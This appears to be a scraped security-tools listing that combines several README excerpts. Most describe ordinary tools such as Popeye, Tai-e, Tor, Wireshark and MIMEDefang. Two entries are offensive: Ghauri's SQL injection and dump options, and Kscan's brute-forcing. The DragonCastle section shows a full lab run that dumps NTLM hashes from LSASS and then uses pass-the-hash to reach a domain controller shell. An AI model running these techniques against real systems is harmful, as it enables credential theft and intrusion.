To save the Popeye report to a file pass the --save flag to the command. By default it will create a temp directory and will store the report there, the path of the temp directory will be printed out on STDOUT. If you have the need to specify the output directory for the report, you can use the environment variable POPEYE_REPORT_DIR. By default, the name of the output file follow the following format : sanitizer_<cluster-name>_<time-UnixNano>.<output-extension> (e.g. : "sanitizer-mycluster-1594019782530851873.html"). If you have the need to specify the output file name for the report, you can pass the --output-file flag with the filename you want as parameter.

Example to save report in working directory:

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save

Example to save report in working directory in HTML format under the name "report.html" :

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save --out html --output-file report.html

Save the report to S3

You can also save the generated report to an AWS S3 bucket (or another S3 compatible Object Storage) with providing the flag --s3-bucket. As parameter you need to provide the name of the S3 bucket where you want to store the report. To save the report in a bucket subdirectory provide the bucket parameter as bucket/path/to/report.

Underlying the AWS Go lib is used which is handling the credential loading. For more information check out the official documentation.

Example to save report to S3:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --out=json

If AWS sS3 is not your bag, you can further define an S3 compatible storage (OVHcloud Object Storage, Minio, Google cloud storage, etc...) using s3-endpoint and s3-region as so:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --s3-region YOUR-REGION --s3-endpoint URL-OF-THE-ENDPOINT

Run public Docker image locally

You don't have to build and/or install the binary to run popeye: you can just run it directly from the official docker repo on DockerHub. The default command when you run the docker container is popeye, so you just need to pass whatever cli args are normally passed to popeye. To access your clusters, map your local kube config directory into the container with -v :

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
derailed/popeye --context foo -n bar

Running the above docker command with --rm means that the container gets deleted when popeye exits. When you use --save, it will write it to /tmp in the container and then delete the container when popeye exits, which means you lose the output. To get around this, map /tmp to the container's /tmp. NOTE: You can override the default output directory location by setting POPEYE_REPORT_DIR env variable.

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
-e POPEYE_REPORT_DIR=/tmp/popeye \
-v /tmp:/tmp \
derailed/popeye --context foo -n bar --save --output-file my_report.txt

# Docker has exited, and the container has been deleted, but the file
# is in your /tmp directory because you mapped it into the container
$ cat /tmp/popeye/my_report.txt
<snip>

The Command Line

You can use Popeye standalone or using a spinach yaml config to tune the sanitizer. Details about the Popeye configuration file are below.

kubeconfig environment. popeye # Popeye uses a spinach config file of course! aka spinachyaml! popeye -f spinach.yml # Popeye a cluster using a kubeconfig context. popeye --context olive # Stuck? popeye help" dir="auto">
# Dump version info
popeye version
# Popeye a cluster using your current kubeconfig environment.
popeye
# Popeye uses a spinach config file of course! aka spinachyaml!
popeye -f spinach.yml
# Popeye a cluster using a kubeconfig context.
popeye --context olive
# Stuck?
popeye help

Output Formats

Popeye can generate sanitizer reports in a variety of formats. You can use the -o cli option and pick your poison from there.

Format Description Default Credits
standard The full monty output iconized and colorized yes
jurassic No icons or color like it's 1979
yaml As YAML
html As HTML
json As JSON
junit For the Java melancholic
prometheus Dumps report a prometheus scrappable metrics dardanel
score Returns a single cluster sanitizer score value (0-100) kabute

The SpinachYAML Configuration

A spinach.yml configuration file can be specified via the -f option to further configure the sanitizers. This file may specify the container utilization threshold and specific sanitizer configurations as well as resources that will be excluded from the sanitization.

NOTE: This file will change as Popeye matures!

Under the excludes key you can configure to skip certain resources, or certain checks by code. Here, resource types are indicated in a group/version/resource notation. Example: to exclude PodDisruptionBugdets, use the notation policy/v1/poddisruptionbudgets. Note that the resource name is written in the plural form and everything is spelled in lowercase. For resources without an API group, the group part is omitted (Examples: v1/pods, v1/services, v1/configmaps).

A resource is identified by a resource kind and a fully qualified resource name, i.e. namespace/resource_name.

For example, the FQN of a pod named fred-1234 in the namespace blee will be blee/fred-1234. This provides for differentiating fred/p1 and blee/p1. For cluster wide resources, the FQN is equivalent to the name. Exclude rules can have either a straight string match or a regular expression. In the latter case the regular expression must be indicated using the rx: prefix.

NOTE! Please be careful with your regex as more resources than expected may get excluded from the report with a loose regex rule. When your cluster resources change, this could lead to a sub-optimal sanitization. Once in a while it might be a good idea to run Popeye β€žconfiglessβ€œ to make sure you will recognize any new issues that may have arisen in your clusters…

Here is an example spinach file as it stands in this release. There is a fuller eks and aks based spinach file in this repo under spinach. (BTW: for new comers into the project, might be a great way to contribute by adding cluster specific spinach file PRs...)

# A Popeye sample configuration file
popeye:
# Checks resources against reported metrics usage.
# If over/under these thresholds a sanitization warning will be issued.
# Your cluster must run a metrics-server for these to take place!
allocations:
cpu:
underPercUtilization: 200 # Checks if cpu is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if cpu is over allocated by more than 50% at current load.
memory:
underPercUtilization: 200 # Checks if mem is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if mem is over allocated by more than 50% usage at current load.

# Excludes excludes certain resources from Popeye scans
excludes:
v1/pods:
# In the monitoring namespace excludes all probes check on pod's containers.
- name: rx:monitoring
code s:
- 102
# Excludes all istio-proxy container scans for pods in the icx namespace.
- name: rx:icx/.*
containers:
# Excludes istio init/sidecar container from scan!
- istio-proxy
- istio-init
# ConfigMap sanitizer exclusions...
v1/configmaps:
# Excludes key must match the singular form of the resource.
# For instance this rule will exclude all configmaps named fred.v2.3 and fred.v2.4
- name: rx:fred.+\.v\d+
# Namespace sanitizer exclusions...
v1/namespaces:
# Exclude all fred* namespaces if the namespaces are not found (404), other error codes will be reported!
- name: rx:kube
codes:
- 404
# Exclude all istio* namespaces from being scanned.
- name: rx:istio
# Completely exclude horizontal pod autoscalers.
autoscaling/v1/horizontalpodautoscalers:
- name: rx:.*

# Configure node resources.
node:
# Limits set a cpu/mem threshold in % ie if cpu|mem > limit a lint warning is triggered.
limits:
# CPU checks if current CPU utilization on a node is greater than 90%.
cpu: 90
# Memory checks if current Memory utilization on a node is greater than 80%.
memory: 80

# Configure pod resources
pod:
# Restarts check the restarts count and triggers a lint warning if above threshold.
restarts:
3
# Check container resource utilization in percent.
# Issues a lint warning if about these threshold.
limits:
cpu: 80
memory: 75

# Configure a list of allowed registries to pull images from
registries:
- quay.io
- docker.io

Popeye In Your Clusters!

Alternatively, Popeye is containerized and can be run directly in your Kubernetes clusters as a one-off or CronJob.

Here is a sample setup, please modify per your needs/wants. The manifests for this are in the k8s directory in this repo.

kubectl apply -f k8s/popeye/ns.yml && kubectl apply -f k8s/popeye
---
apiVersion: batch/v1
kind: CronJob
metadata:
name: popeye
namespace: popeye
spec:
schedule: "* */1 * * *" # Fire off Popeye once an hour
concurrencyPolicy: Forbid
jobTemplate:
spec:
template:
spec:
serviceAccountName: popeye
restartPolicy: Never
containers:
- name: popeye
image: derailed/popeye
imagePullPolicy: IfNotPresent
args:
- -o
- yaml
- --force-exit-zero
- true
resources:
limits:
cpu: 500m
memory: 100Mi

The --force-exit-zero should be set to true. Otherwise, the pods will end up in an error state. Note that popeye exits with a non-zero error code if the report has any errors.

Popeye got your RBAC!

In order for Popeye to do his work, the signed-in user must have enough RBAC oomph to get/list the resources mentioned above.

Sample Popeye RBAC Rules (please note that those are subject to change.)

---
# Popeye ServiceAccount.
apiVersion: v1
kind: ServiceAccount
metadata:
name: popeye
namespace: popeye

---
# Popeye needs get/list access on the following Kubernetes resources.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: popeye
rules:
- apiGroups: [""]
resources:
- configmaps
- deployments
- endpoints
- horizontalpodautoscalers
- namespaces
- nodes
- persistentvolumes
- persistentvolumeclaims
- pods
- secrets
- serviceaccounts
- services
- statefulsets
verbs: ["get", "list"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources:
- clusterroles
- clusterrolebindings
- roles
- rolebindings
verbs: ["get", "list"]
- apiGroups: ["metrics.k8s.io"]
resources :
- pods
- nodes
verbs: ["get", "list"]

---
# Binds Popeye to this ClusterRole.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: popeye
subjects:
- kind: ServiceAccount
name: popeye
namespace: popeye
roleRef:
kind: ClusterRole
name: popeye
apiGroup: rbac.authorization.k8s.io

Screenshots

Cluster D Score

Cluster A Score

Report Morphology

The sanitizer report outputs each resource group scanned and their potential issues. The report is color/emoji coded in term of Sanitizer severity levels:

Level Icon Jurassic Color Description
Ok
βœ…
OK Green Happy!
Info
ο”Š
I BlueGreen FYI
Warn

W Yellow Potential Issue
Error
ο’₯
E Red Action required

The heading section for each scanned Kubernetes resource provides a summary count for each of the categories above.

The Summary section provides a Popeye Score based on the sanitization pass on the given cluster.

Known Issues

This initial drop is brittle. Popeye will most likely blow up when…

  • You're running older versions of Kubernetes. Popeye works best with Kubernetes 1.13+.
  • You don't have enough RBAC oomph to manage your cluster (see RBAC section)

Disclaimer

This is work in progress! If there is enough interest in the Kubernetes community, we will enhance per your recommendations/contributions. Also if you dig this effort, please let us know that too!

ATTA Girls/Boys!

Popeye sits on top of many of open source projects and libraries. Our sincere appreciations to all the OSS contributors that work nights and weekends to make this project a reality!

Contact Info

  1. Email: fernand@imhotep.io
  2. Twitter: @kitesurfer


Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java


Tai-e

What is Tai-e?

Tai-e (Chinese: ε€ͺ阿; pronunciation: [ˈtaΙͺΙ™:]) is a new static analysis framework for Java (please see our technical report for details), which features arguably the "best" designs from both the novel ones we proposed and those of classic frameworks such as Soot, WALA, Doop, and SpotBugs. Tai-e is easy-to-learn, easy-to-use, efficient, and highly extensible, allowing you to easily develop new analyses on top of it.

Currently, Tai-e provides the following major analysis components (and more analyses are on the way):

  • Powerful pointer analysis framework
    • On-the-fly call graph construction
    • Various classic and advanced techniques of heap abstraction and context sensitivity for pointer analysis
    • Extensible analysis plugin system (allows to conveniently develop and add new analyses that interact with pointer analysis)
  • Various fundamental/client/utility analyses
    • Fundamental analyses, e.g., reflection analysis and exception analysis
    • Modern language feature analyses, e.g., lambda and method reference analysis, and invokedynamic analysis
    • Clients, e.g., configurable taint analysis (allowing to configure sources, sinks and taint transfers)
    • Utility tools like analysis timer, constraint checker (for debugging), and various graph dumpers
  • Control/Data-flow analysis framework
    • Control-flow graph construction
    • Classic data-flow analyses, e.g., live variable analysis, constant propagation
    • Your data-flow analyses
  • SpotBugs-like bug detection system
    • Bug detectors, e.g., null pointer detector, incorrect clone() detector
    • Your bug detectors

Tai-e is developed in Java, and it can run on major operating systems including Windows, Linux, and macOS.


How to Obtain Runnable Jar of Tai-e?

The simplest way is to download it from GitHub Releases.

Alternatively, you might build the latest Tai-e yourself from the source code. This can be simply done via Gradle (be sure that Java 17 (or higher version) is available on your system). You just need to run command gradlew fatJar, and then the runnable jar will be generated in tai-e/build/, which includes Tai-e and all its dependencies.

Documentation

We are hosting the documentation of Tai-e on the GitHub wiki, where you could find more information about Tai-e such as Setup in IntelliJ IDEA , Command-Line Options , and Development of New Analysis .

Tai-e Assignments

In addition, we have developed an educational version of Tai-e where eight programming assignments are carefully designed for systematically training learners to implement various static analysis techniques to analyze real Java programs. The educational version shares a large amount of code with Tai-e, thus doing the assignments would be a good way to get familiar with Tai-e.



TOR Virtual Network Tunneling Tool 0.4.7.13

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.

Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws


An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws


Requirements

  • Python 3
  • Python pip3

Installation

  • cd to ghauri directory.
  • install requirements: python3 -m pip install --upgrade -r requirements.txt
  • run: python3 setup.py install or python3 -m pip install -e .
  • you will be able to access and run the ghauri with simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

  • Supports following types of injection payloads:
    • Boolean based.
    • Error Based
    • Time Based
    • Stacked Queries
  • Support SQL injection for following DBMS.
    • MySQL
    • Microsoft SQL Server
    • Postgre
    • Oracle
  • Supports following injection types.
    • GET/POST Based injections
    • Headers Based injections
    • Cookies Based injections
    • Mulitipart Form data injections
    • JSON based injections
  • support proxy option --proxy.
  • supports parsing request from txt file: switch for that -r file.txt
  • supports limiting data extraction for dbs/tables/columns/dump: swicth --start 1 --stop 2
  • added support for resuming of all phases.
  • added support for skip urlencoding switch: --skip-urlencode
  • added support to verify extracted characters in case of boolean/time based injections.

Advanced Usage


Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target

Target:
At least one of these options has to be provided to define the
target(s)

-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1).
-r REQUESTFILE Load HTTP request from a file

Request:
These options can be used to specify how to connect to the target URL

-A , --user-agent HTTP User-Agent header value -H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS

Injection:
These options can be used to specify which paramete rs to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string

Detection:
These options can be used to customize the detection phase

--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)

Enumeration:
These options can be used to enumerate the back-end database
managment system information, structure and data contained in the
tables.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrive entries from offset for dbs/tables/columns/dump
--stop Retrive entries till offset for dbs/tables/columns/dump

Example:
ghauri http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local,state and federal laws.
Developer assume no liability and is not responsible for any misuse or damage caused by this program.

TODO

  • Add support for inline queries.
  • Add support for Union based queries


Wireshark Analyzer 4.0.3

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process


A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.

The DLLMain always returns False so the processes doesn't keep it.


Caveats

It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:

Build Support
Windows 10 version 21H2
Windows 10 version 21H1 Implemented
Windows 10 version 20H2 Implemented
Windows 10 version 20H1 (2004) Implemented
Windows 10 version 1909 Implemented
Windows 10 version 1903 Implemented
Windows 10 version 1809 Implemented
Windows 10 version 1803 Implemented
Windows 10 version 1709 Implemented
Windows 10 version 1703 Implemented
Windows 10 version 1607 Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value" dir="auto">
psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 dragoncastle.py -h                                                                                                                                            
DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid doma in name
-hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value
</ pre>

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977 b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:

============
[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|β‡’  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivile ge Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege En able computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel FernΓ‘ndez (@TheXC3LL)

References



Kscan - Simple Asset Mapping Tool


0 Disclaimer (The author did not participate in the XX action, don't trace it)

  • This tool is only for legally authorized enterprise security construction behaviors and personal learning behaviors. If you need to test the usability of this tool, please build a target drone environment by yourself.

  • When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. Do not scan unauthorized targets.

We reserve the right to pursue your legal responsibility if the above prohibited behavior is found.

If you have any illegal behavior in the process of using this tool, you shall bear the corresponding consequences by yourself, and we will not bear any legal and joint responsibility.

Before installing and using this tool, please be sure to carefully read and fully understand the terms and conditions.

Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not install and use this tool. Your use behavior or your acceptance of this Agreement in any other express or implied manner shall be deemed that you have read and agreed to be bound by this Agreement.

1 Introduction

 _   __
|#| /#/ Lightweight Asset Mapping Tool by: kv2
|#|/#/ _____ _____ * _ _
|#.#/ /Edge/ /Forum| /#\ |#\ |#|
|##| |#|___ |#| /###\ |##\|#|
|#.#\ \#####\|#| /#/_\#\ |#.#.#|
|#|\#\ /\___|#||#|____/#/###\#\|#|\##|
|#| \#\\#####/ \#####/#/ \#\#| \#|

Kscan is an asset mapping tool that can perform port scanning, TCP fingerprinting and banner capture for specified assets, and obtain as much port information as possible without sending more packets. It can perform automatic brute force cracking on scan results, and is the first open source RDP brute force cracking tool on the go platform.

2 Foreword

At present, there are actually many tools for asset scanning, fingerprint identification, and vulnerability detection, and there are many great tools, but Kscan actually has many different ideas.

  • Kscan hopes to accept a variety of input formats, and there is no need to classify the scanned objects before use, such as IP, or URL address, etc. This is undoubtedly an unnecessary workload for users, and all entries can be normal Input and identification. If it is a URL address, the path will be reserved for detection. If it is only IP:PORT, the port will be prioritized for protocol identification. Currently Kscan supports three input methods (-t,--target|-f,--fofa|--spy).

  • Kscan does not seek efficiency by comparing port numbers with common protocols to confirm port protocols, nor does it only detect WEB assets. In this regard, Kscan pays more attention to accuracy and comprehensiveness, and only high-accuracy protocol identification , in order to provide good detection conditions for subsequent application layer identification.

  • Kscan does not use a modular approach to do pure function stacking, such as a module obtains the title separately, a module obtains SMB information separately, etc., runs independently, and outputs independently, but outputs asset information in units of ports, such as ports If the protocol is HTTP, subsequent fingerprinting and title acquisition will be performed automatically. If the port protocol is RPC, it will try to obtain the host name, etc.

3 Compilation Manual

Compiler Manual

4 Get started

Kscan currently has 3 ways to input targets

  • -t/--target can add the --check parameter to fingerprint only the specified target port, otherwise the target will be port scanned and fingerprinted
IP address: 114.114.114.114
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
  • --spy can add the --scan parameter to perform port scanning and fingerprinting on the surviving C segment, otherwise only the surviving network segment will be detected
[Empty]: will detect the IP address of the local machine and detect the B segment where the local IP is located
[all]: All private network addresses (192.168/172.32/10, etc.) will be probed
IP address: will detect the B segment where the specified IP address is located
  • -f/--fofa can add --check to verify the survivability of the retrieval results, and add the --scan parameter to perform port scanning and fingerprint identification on the retrieval results, otherwise only the fofa retrieval results will be returned
fofa search keywords: will directly return fofa search results

5 Instructions

usage: kscan [-h,--help,--fofa-syntax] (-t,--target,-f,--fofa,--spy) [-p,--port|--top] [-o,--output] [-oJ] [--proxy] [--threads] [--path] [--host] [--timeout] [-Pn] [-Cn] [-sV] [--check] [--encoding] [--hydra] [hydra options] [fofa options]


optional arguments:
-h , --help show this help message and exit
-f , --fofa Get the detection object from fofa, you need to configure the environment variables in advance: FOFA_EMAIL, FOFA_KEY
-t , --target Specify the detection target:
IP address: 114.114.114.114
IP address segment: 114.114.114.114/24, subnet mask less than 12 is not recommended
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
--spy network segment detection mode, in this mode, the internal network segment reachable by the host will be automatically detected. The acceptable parameters are:
(empty), 192, 10, 172, all, specified IP address (the IP address B segment will be detected as the surviving gateway)
--check Fingerprinting the target address, only port detection will not be performed
--scan will perform port scanning and fingerprinting on the target objects provided by --fofa and --spy
-p , --port scan the specified port, TOP400 will be scanned by default, support: 80, 8080, 8088-8090
-eP, --excluded-port skip scanning specified ports,support:80,8080,8088-8090
-o , --output save scan results to file
-oJ save the scan results to a file in json format
-Pn After using this parameter, intelligent survivability detection will not be performed. Now intelligent survivability detection is enabled by default to improve efficiency.
-Cn With this parameter, the console output will not be colored.
-sV After using this parameter, all ports will be probed with full probes. This parameter greatly affects the efficiency, so use it with caution!
--top Scan the filtered common ports TopX, up to 1000, the default is TOP400
--proxy set proxy (socks5|socks4|https|http)://IP:Port
--threads thread parameter, the default thread is 100, the maximum value is 2048
--path specifies the directory to request access, only a single directory is supported
--host specifies the header Host value for all requests
--timeout set timeout
--encoding Set the terminal output encoding, which can be specified as: gb2312, utf-8
--match returns the banner to the asset for retrieval. If there is a keyword, it will be displayed, otherwise it will not be displayed
--hydra automatic blasting support protocol: ssh, rdp, ftp, smb, mysql, mssql, oracle, postgresql, mongodb, redis, all are enabled by default
hydra options:
--hydra-user custom hydra blasting username: username or user1,user2 or file:username.txt
--hydra-pass Custom hydra blasting password: password or pass1,pass2 or file:password.txt
If there is a comma in the password, use \, to escape, other symbols do not need to be escaped
--hydra-update Customize the user name and password mode. If this parameter is carried, it is a new mode, and the user name and password will be added to the default dictionary. Otherwise the default dictionary will be replaced.
--hydra-mod specifies the automatic brute force cracking module: rdp or rdp, ssh, smb
fofa options:
--fofa-syntax will get fofa search syntax description
--fofa-size will set the number of entries returned by fofa, the default is 100
--fofa-fix-keyword Modifies the keyword, and the {} in this parameter will eventually be replaced with the value of the -f parameter

The function is not complicated, the others are explored by themselves

6 Demo

6.1 Port Scan Mode

6.2 Survival network segment detection

6.3 Fofa result retrieval

6.4 Brute-force cracking

6.5 CDN identification



MIMEDefang Email Scanner 3.3

MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches.

APTRS - Automated Penetration Testing Reporting System


APTRS (Automated Penetration Testing Reporting System) is an automated reporting tool in Python and Django. The tool allows Penetration testers to create a report directly without using the Traditional Docx file. It also provides an approach to keeping track of the projects and vulnerabilities.


Documentation

Documentation

Prerequisites

Installation

The tool has been tested using Python 3.8.10 on Kali Linux 2022.2/3, Ubuntu 20.04.5 LTS, Windows 10/11.

Windows Installation

  git clone https://github.com/Anof-cyber/APTRS.git
cd APTRS
install.bat

Linux Installation

  git clone https://github.com/Anof-cyber/APTRS.git
cd APTRS
install.sh

Running

Windows

  run.bat

Linux

  run.sh

Features

  • Demo Report
  • Managing Vulnerabilities
  • Manage All Projects in one place
  • Create a Vulnerability Database and avoid writing the same description and recommendations again
  • Easily Create PDF Reprot
  • Dynamically add POC, Description and Recommendations
  • Manage Customers and Comapany

Screenshots

Project

View Project

Project Vulnerability

Project Report

Project Add Vulnerability

Roadmap

  • Improving Report Quality
  • Bulk Instance Upload
  • Pentest Mapper Burp Suite Extension Integration
  • Allowing Multiple Project Scope
  • Improving Code, Error handling and Security
  • Docker Support
  • Implementing Rest API
  • Project and Project Retest Handler
  • Access Control and Authorization
  • Support Nessus Parsing

Authors



LATMA - Lateral Movement Analyzer Tool


Lateral movement analyzer (LATMA) collects authentication logs from the domain and searches for potential lateral movement attacks and suspicious activity. The tool visualizes the findings with diagrams depicting the lateral movement patterns. This tool contains two modules, one that collects the logs and one that analyzes them. You can execute each of the modules separately, the event log collector should be executed in a Windows machine in an active directory domain environment with python 3.8 or above. The analyzer can be executed in a linux machine and a Windows machine.


The Collector

